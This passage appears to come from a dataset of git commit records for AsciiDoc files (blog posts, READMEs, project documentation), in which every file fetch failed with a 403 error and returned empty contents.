'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7db3c32d6b48a284e276fbc8944fac3692a50890","subject":"y2b create post This Simple Trick Will Speed Up Any Android","message":"y2b create post This Simple Trick Will Speed Up Any Android","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-08-14-This-Simple-Trick-Will-Speed-Up-Any-Android.adoc","new_file":"_posts\/2016-08-14-This-Simple-Trick-Will-Speed-Up-Any-Android.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c85aa44b13d2f1e9be2604ad00ebded093304fdb","subject":"Inform that scanner must be enabled for hot-deploy","message":"Inform that scanner must be enabled for 
hot-deploy","repos":"pilhuhn\/hawkular.github.io,lzoubek\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,lzoubek\/hawkular.github.io,jsanda\/hawkular.github.io,jpkrohling\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,lzoubek\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,jpkrohling\/hawkular.github.io,ppalaga\/hawkular.github.io,pilhuhn\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,tsegismont\/hawkular.github.io,lucasponce\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,tsegismont\/hawkular.github.io,metlos\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,metlos\/hawkular.github.io,ppalaga\/hawkular.github.io,metlos\/hawkular.github.io,metlos\/hawkular.github.io,hawkular\/hawkular.github.io,tsegismont\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,ppalaga\/hawkular.github.io,pilhuhn\/hawkular.github.io,ppalaga\/hawkular.github.io,jpkrohling\/hawkular.github.io,lzoubek\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/dev\/development.adoc","new_file":"src\/main\/jbake\/content\/docs\/dev\/development.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"eb8e2ec9fb13320a9a3b2060526d5f2b25c00102","subject":"Added readme for Level files.","message":"Added readme for Level files.\n","repos":"dom96\/BrokenBonez","old_file":"BrokenBonez\/app\/src\/main\/assets\/levels\/readme.asciidoc","new_file":"BrokenBonez\/app\/src\/main\/assets\/levels\/readme.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dom96\/BrokenBonez.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6bc50dde3893ed2915e41e0395a1341ec5f5482e","subject":"add Ch4_AdvancedPromises\/promise-library.adoc","message":"add 
Ch4_AdvancedPromises\/promise-library.adoc\n","repos":"genie88\/promises-book,purepennons\/promises-book,lidasong2014\/promises-book,wenber\/promises-book,tangjinzhou\/promises-book,liyunsheng\/promises-book,lidasong2014\/promises-book,mzbac\/promises-book,liubin\/promises-book,wenber\/promises-book,genie88\/promises-book,liubin\/promises-book,dieface\/promises-book,purepennons\/promises-book,wangwei1237\/promises-book,wenber\/promises-book,liyunsheng\/promises-book,mzbac\/promises-book,cqricky\/promises-book,sunfurong\/promise,purepennons\/promises-book,xifeiwu\/promises-book,xifeiwu\/promises-book,genie88\/promises-book,tangjinzhou\/promises-book,xifeiwu\/promises-book,oToUC\/promises-book,wangwei1237\/promises-book,sunfurong\/promise,sunfurong\/promise,tangjinzhou\/promises-book,cqricky\/promises-book,dieface\/promises-book,liubin\/promises-book,oToUC\/promises-book,wangwei1237\/promises-book,lidasong2014\/promises-book,cqricky\/promises-book,mzbac\/promises-book,oToUC\/promises-book,dieface\/promises-book,liyunsheng\/promises-book","old_file":"Ch4_AdvancedPromises\/promise-library.adoc","new_file":"Ch4_AdvancedPromises\/promise-library.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xifeiwu\/promises-book.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"596bcaf3c0ceb6d81041d3c2ce29daaeb5fd91cb","subject":"initial draft","message":"initial draft\n","repos":"OpenHFT\/Chronicle-Queue,OpenHFT\/Chronicle-Queue","old_file":"docs\/Queue-Replication-Message-Protocol-Overview.adoc","new_file":"docs\/Queue-Replication-Message-Protocol-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OpenHFT\/Chronicle-Queue.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"523443c2017c5e3004478ac200cc780fa347c26e","subject":"Update 2016-12-09-re-Invent-and-that-going-abroad.adoc","message":"Update 2016-12-09-re-Invent-and-that-going-abroad.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-09-re-Invent-and-that-going-abroad.adoc","new_file":"_posts\/2016-12-09-re-Invent-and-that-going-abroad.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b64b4a4fd5a48372319e21f1b1d36646151b474f","subject":"y2b create post Unboxing The $5000 Massage Chair...","message":"y2b create post Unboxing The $5000 Massage Chair...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-09-15-Unboxing-The-5000-Massage-Chair.adoc","new_file":"_posts\/2017-09-15-Unboxing-The-5000-Massage-Chair.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e237578861358c8417e990a666d8d2af5613884d","subject":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","message":"Update 
2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e2155bed298085c0ec60d04d7de71141851dbe1f","subject":"Suppl style","message":"Suppl style\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Best practices\/Style.adoc","new_file":"Best practices\/Style.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d722f8804121924c4c4c6646a78fb817e4391924","subject":"0.10.0.Final release announcement","message":"0.10.0.Final release announcement\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2019-10-02-debezium-0-10-0-final-released.adoc","new_file":"blog\/2019-10-02-debezium-0-10-0-final-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"faa00497c5ff99f716bbf977e07938314d99bd3a","subject":"y2b create post Tablet Showdown: iPad 2 vs Galaxy Tab 10.1 vs HP TouchPad","message":"y2b create post Tablet Showdown: iPad 2 vs Galaxy Tab 10.1 vs HP TouchPad","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-07-09-Tablet-Showdown-iPad-2-vs-Galaxy-Tab-101-vs-HP-TouchPad.adoc","new_file":"_posts\/2011-07-09-Tablet-Showdown-iPad-2-vs-Galaxy-Tab-101-vs-HP-TouchPad.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"66f998b6cc434375113bda586fbb32a2cd5f0724","subject":"y2b create post GoPro Hero3 HD Camera Unboxing (Black Edition)","message":"y2b create post GoPro Hero3 HD Camera Unboxing (Black Edition)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-02-05-GoPro-Hero3-HD-Camera-Unboxing-Black-Edition.adoc","new_file":"_posts\/2013-02-05-GoPro-Hero3-HD-Camera-Unboxing-Black-Edition.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6d530f9fab8563b28777b2e5aba09057194ce6bd","subject":"Update 2016-08-04-Why-are-all-programming-languages-in-English.adoc","message":"Update 
2016-08-04-Why-are-all-programming-languages-in-English.adoc","repos":"jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io","old_file":"_posts\/2016-08-04-Why-are-all-programming-languages-in-English.adoc","new_file":"_posts\/2016-08-04-Why-are-all-programming-languages-in-English.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jbrizio\/jbrizio.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0f11ca7bc6c9c35216a2024ee26166be83fa8c13","subject":"OGM-521 Update Neo4j javadoc","message":"OGM-521 Update Neo4j javadoc\n","repos":"uugaa\/hibernate-ogm,tempbottle\/hibernate-ogm,mp911de\/hibernate-ogm,gunnarmorling\/hibernate-ogm,ZJaffee\/hibernate-ogm,hibernate\/hibernate-ogm,ZJaffee\/hibernate-ogm,DavideD\/hibernate-ogm-contrib,schernolyas\/hibernate-ogm,gunnarmorling\/hibernate-ogm,DavideD\/hibernate-ogm,hferentschik\/hibernate-ogm,DavideD\/hibernate-ogm-cassandra,gunnarmorling\/hibernate-ogm,schernolyas\/hibernate-ogm,DavideD\/hibernate-ogm,jhalliday\/hibernate-ogm,jhalliday\/hibernate-ogm,DavideD\/hibernate-ogm,hibernate\/hibernate-ogm,Sanne\/hibernate-ogm,tempbottle\/hibernate-ogm,emmanuelbernard\/hibernate-ogm,schernolyas\/hibernate-ogm,tempbottle\/hibernate-ogm,hibernate\/hibernate-ogm,Sanne\/hibernate-ogm,DavideD\/hibernate-ogm-contrib,DavideD\/hibernate-ogm-cassandra,Sanne\/hibernate-ogm,hibernate\/hibernate-ogm,mp911de\/hibernate-ogm,Sanne\/hibernate-ogm,DavideD\/hibernate-ogm-cassandra,uugaa\/hibernate-ogm,mp911de\/hibernate-ogm,DavideD\/hibernate-ogm,ZJaffee\/hibernate-ogm,DavideD\/hibernate-ogm-contrib,uugaa\/hibernate-ogm,jhalliday\/hibernate-ogm","old_file":"documentation\/manual\/src\/main\/asciidoc\/en-US\/modules\/neo4j.asciidoc","new_file":"documentation\/manual\/src\/main\/asciidoc\/en-US\/modules\/neo4j.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DavideD\/hibernate-ogm-contrib.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"fe3bcc00a02b69131387a9b3284a571d344401d4","subject":"Update 2016-12-01-A-W-S-re-Invent2016-firstday.adoc","message":"Update 2016-12-01-A-W-S-re-Invent2016-firstday.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-01-A-W-S-re-Invent2016-firstday.adoc","new_file":"_posts\/2016-12-01-A-W-S-re-Invent2016-firstday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7732eb4d46edec7df6667764867592e06c70a0c9","subject":"y2b create post The Most Ridiculous Purchase...","message":"y2b create post The Most Ridiculous Purchase...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-09-13-The-Most-Ridiculous-Purchase.adoc","new_file":"_posts\/2017-09-13-The-Most-Ridiculous-Purchase.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"830dff9847bd5890f8ae7d22221f8072becfdc86","subject":"Fix typo in documentation","message":"Fix typo in documentation\n","repos":"costin\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,xjrk58\/elasticsearch-hadoop,takezoe\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/core\/configuration.adoc","new_file":"docs\/src\/reference\/asciidoc\/core\/configuration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xjrk58\/elasticsearch-hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0288a429d1738477ad1cc5ee9b72e4ffa86610eb","subject":"Add router limits design docs","message":"Add router limits design docs\n","repos":"EnMasseProject\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse","old_file":"documentation\/design_docs\/design\/router-limits.adoc","new_file":"documentation\/design_docs\/design\/router-limits.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenmalloy\/enmasse.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"998334d94f17673c53d1febd96b88a7a812949fc","subject":"#56: started to extract tests from adoc files","message":"#56: started to extract tests from adoc files\n","repos":"marcphilipp\/junit-lambda,junit-team\/junit-lambda,marcphilipp\/junit5,sbrannen\/junit-lambda","old_file":"documentation\/src\/test\/java\/example\/writing-tests.adoc","new_file":"documentation\/src\/test\/java\/example\/writing-tests.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/marcphilipp\/junit5.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"b150c185460f23d1a6b6b8d9d4a892c265b845db","subject":"Update 2017-07-03-The-user-friendly-computer-programs.adoc","message":"Update 2017-07-03-The-user-friendly-computer-programs.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2017-07-03-The-user-friendly-computer-programs.adoc","new_file":"_posts\/2017-07-03-The-user-friendly-computer-programs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"00f97b2218287d7326d9dd55fe15581fd11de100","subject":"Update 2018-04-02-.adoc","message":"Update 2018-04-02-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-04-02-.adoc","new_file":"_posts\/2018-04-02-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0bd4992e5816dfadb1cc52aabd7803142772fd71","subject":"y2b create post How To Turn Air Into Drinking Water","message":"y2b create post How To Turn Air Into Drinking 
Water","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-04-21-How-To-Turn-Air-Into-Drinking-Water.adoc","new_file":"_posts\/2017-04-21-How-To-Turn-Air-Into-Drinking-Water.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6a08f3457997d014edafda7ee18ffd6d23ebd7f9","subject":"Update 2017-10-27-Nginxngx-small-lightminio-S3-Docker.adoc","message":"Update 2017-10-27-Nginxngx-small-lightminio-S3-Docker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-27-Nginxngx-small-lightminio-S3-Docker.adoc","new_file":"_posts\/2017-10-27-Nginxngx-small-lightminio-S3-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fd87962819e54f3ee8c7ebe9af6b37f083cf31cd","subject":"Update 2016-10-04-iOS-10-Remote-Notification.adoc","message":"Update 2016-10-04-iOS-10-Remote-Notification.adoc","repos":"dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io","old_file":"_posts\/2016-10-04-iOS-10-Remote-Notification.adoc","new_file":"_posts\/2016-10-04-iOS-10-Remote-Notification.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dakeshi\/dakeshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7ed80db97f2245d3a2021ec6cdb6bfdf9d5353e3","subject":"Update 2015-02-10-RK.adoc","message":"Update 2015-02-10-RK.adoc","repos":"simonturesson\/hubpresstestsimon,simonturesson\/hubpresstestsimon,simonturesson\/hubpresstestsimon,simonturesson\/hubpresstestsimon","old_file":"_posts\/2015-02-10-RK.adoc","new_file":"_posts\/2015-02-10-RK.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simonturesson\/hubpresstestsimon.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"60865aa454ebbfe5a1f0c8adb1db379b5f926016","subject":"y2b create post Can This Case Fix The iPhone's Biggest Problem?","message":"y2b create post Can This Case Fix The iPhone's Biggest Problem?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-12-01-Can-This-Case-Fix-The-iPhones-Biggest-Problem.adoc","new_file":"_posts\/2016-12-01-Can-This-Case-Fix-The-iPhones-Biggest-Problem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ec73a6e18e2aa089cfe7947f71b1ee5077fe8dc8","subject":"Update 2017-01-12-Quick-Tips-1-Centralizando-Elementos.adoc","message":"Update 
2017-01-12-Quick-Tips-1-Centralizando-Elementos.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2017-01-12-Quick-Tips-1-Centralizando-Elementos.adoc","new_file":"_posts\/2017-01-12-Quick-Tips-1-Centralizando-Elementos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3c0acd6d128de9c87b5f6f8dea7e77a360f3d141","subject":"Update 2015-09-23-When-it-hits-it-hurts-doesnt-it.adoc","message":"Update 2015-09-23-When-it-hits-it-hurts-doesnt-it.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-09-23-When-it-hits-it-hurts-doesnt-it.adoc","new_file":"_posts\/2015-09-23-When-it-hits-it-hurts-doesnt-it.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0a47d0e03ffc0d3fc9fd69a84125c6bad7f1e993","subject":"Update 2016-10-05-11092015-Maj-diagramme-createur.adoc","message":"Update 2016-10-05-11092015-Maj-diagramme-createur.adoc","repos":"3991\/3991.github.io,3991\/3991.github.io,3991\/3991.github.io,3991\/3991.github.io","old_file":"_posts\/2016-10-05-11092015-Maj-diagramme-createur.adoc","new_file":"_posts\/2016-10-05-11092015-Maj-diagramme-createur.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/3991\/3991.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"14d0e0f827e0b4e42c66fcc26f908f16e1718979","subject":"Update 2016-08-08-Just-how-much-luggage-is-getting-lost-with-British-Airways.adoc","message":"Update 2016-08-08-Just-how-much-luggage-is-getting-lost-with-British-Airways.adoc","repos":"danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io","old_file":"_posts\/2016-08-08-Just-how-much-luggage-is-getting-lost-with-British-Airways.adoc","new_file":"_posts\/2016-08-08-Just-how-much-luggage-is-getting-lost-with-British-Airways.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danharr\/danharr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"40e411c7156648ae0cf347402c2ea555bd69f2ca","subject":"Adding target for ADD","message":"Adding target for ADD\n\nHi,\r\nJust a suggestion to add the target to the line of downloading the JDK9. 
Potentially consider making this line (with the download) the not-commented option to ensure the Dockerfile works first time a build is attempted.\r\nThanks,\r\nPeter Dam","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch03-build-image-java-9.adoc","new_file":"developer-tools\/java\/chapters\/ch03-build-image-java-9.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4d526f05b93640a82a9bed75ba0ba0b416890ec7","subject":"add link to issue for root certs","message":"add link to issue for root certs\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch03-build-image-java-9.adoc","new_file":"developer-tools\/java\/chapters\/ch03-build-image-java-9.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"41e1d8091f13894b7e22b94affa8569439e00f6d","subject":"build instructions","message":"build instructions\n","repos":"dmontag\/neo4j-enterprise,dmontag\/neo4j-enterprise","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dmontag\/neo4j-enterprise.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"e037bcc5e9dcfa460eae969f1490812d2227bd3d","subject":"Start README.asciidoc","message":"Start README.asciidoc\n","repos":"rmuhamedgaliev\/JPS,rmuhamedgaliev\/JPS","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rmuhamedgaliev\/JPS.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b74e6e10078177f41786b4dac056412591671859","subject":"Fixes #1953: Add a readme for Rudder","message":"Fixes #1953: Add a readme for Rudder\n","repos":"ncharles\/rudder,fanf\/rudder,Kegeruneku\/rudder,jooooooon\/rudder,jooooooon\/rudder,Kegeruneku\/rudder,ncharles\/rudder,ncharles\/rudder,fanf\/rudder,jooooooon\/rudder,Kegeruneku\/rudder,fanf\/rudder","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Kegeruneku\/rudder.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"1273b8af4ee8005efcf1b130990e63e6d4b92a5a","subject":"Update 2016-10-14-full-tank.adoc","message":"Update 2016-10-14-full-tank.adoc","repos":"tmdgus0118\/blog.code404.co.kr,tmdgus0118\/blog.code404.co.kr,tmdgus0118\/blog.code404.co.kr,tmdgus0118\/blog.code404.co.kr","old_file":"_posts\/2016-10-14-full-tank.adoc","new_file":"_posts\/2016-10-14-full-tank.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tmdgus0118\/blog.code404.co.kr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a960cd37fe75bfe59c36f221fe6bc0f78022b644","subject":"Update 
2017-04-08-Tea-Break.adoc","message":"Update 2017-04-08-Tea-Break.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-04-08-Tea-Break.adoc","new_file":"_posts\/2017-04-08-Tea-Break.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aae9fb7e41d486477dabf916c0f8d604374c64c1","subject":"Added an asciidoc version","message":"Added an asciidoc version\n","repos":"beloglazov\/openstack-centos-kvm-glusterfs","old_file":"doc\/openstack-centos-kvm-glusterfs-guide.asciidoc","new_file":"doc\/openstack-centos-kvm-glusterfs-guide.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/beloglazov\/openstack-centos-kvm-glusterfs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1fa64c62f2b66f10731df10dba75f9a746dbd678","subject":"Update 2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","message":"Update 2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","new_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"847e1d6322a192e80a8105962e25a1fb26508570","subject":"Update 1993-11-17.adoc","message":"Update 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/1993-11-17.adoc","new_file":"_posts\/1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ecbeffcb1eefdc9d9c7254f1f7587f1da113a784","subject":"Add note about min_score filtering efficiency (#23109)","message":"Add note about min_score filtering efficiency 